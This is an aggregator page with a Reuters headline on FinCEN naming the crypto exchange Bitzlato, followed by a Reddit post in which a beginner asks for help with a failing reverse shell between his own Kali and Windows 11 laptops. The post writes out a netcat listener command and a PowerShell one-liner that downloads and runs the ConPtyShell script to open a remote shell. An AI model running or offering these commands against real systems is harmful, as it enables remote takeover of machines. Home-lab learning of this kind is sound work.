The US Treasury’s FinCEN unit identifies crypto exchange Bitzlato as a “money laundering concern” related to Russia; Bitzlato has been seized by French police (Reuters)

Reuters:
The US Treasury’s FinCEN unit identifies crypto exchange Bitzlato as a “money laundering concern” related to Russia; Bitzlato has been seized by French police  —  The U.S. Treasury Department’s Financial Crimes En…

Read More >>

Error While Attempting Reverse Shell with Windows 11 and Kali Linux.

So I’ve recently developed an interest in information security and have started to learn certain basic hacks such as DOS Attacks and smaller wifi-related “Hacks”. I’m a complete beginner so my knowledge is very limited.

I recently tried to follow a Youtube video on how to execute a reverse shell by NetworkChuck. Link to video: https://www.youtube.com/watch?v=bXCeFPNWjsM

I followed all the steps apart from 1, the step where he creates a cloud hacking machine on a website, I did not do that.

My attacking machine is a Kali Linux laptop. I entered this command into the terminal:

stty raw -echo; (stty size; cat) | nc -lvnp 87 -s <attacking machine IPV4 address> 

My victim machine is a Windows 11 laptop. I entered this command into PowerShell as an admin:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <attacking machine IPV4> 87 

I got these commands from the GitHub repo mentioned in the video, which you can find here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#fully-interactive-reverse-shell-on-windows:~:text=Fully%20interactive%20reverse%20shell%20on%20Windows

However, whenever I run the command on my Windows machine, I get the following error:

CreatePseudoConsole function found! Spawning a fully interactive shell ConPtyShellException: [-] ConPtyShellException: WSAConnect failed with error code: 10060 at ConPtyShell.connectRemote(String remoteIp, Int32 remotePort) at ConPtyShell.SpawnConPtyShell(String remoteIp, Int32 remotePort, UInt32 rows, UInt32 cols, String commandLine, Boolean upgradeShell) at ConPtyShellMainClass.ConPtyShellMain(String[] args) 

I have tried using my Linux machine’s local IPV4 as well as connecting to a hamachi server and using that IPV4, but alas, the error stays the same.

I would really appreciate a hand trying to fix this or at least trying to understand what’s going on. I’ve tried to Google it but I can’t quite come up with a good search prompt.

Thank you in advance!

submitted by /u/Rare_Ad_9417
[link] [comments]

Read More >>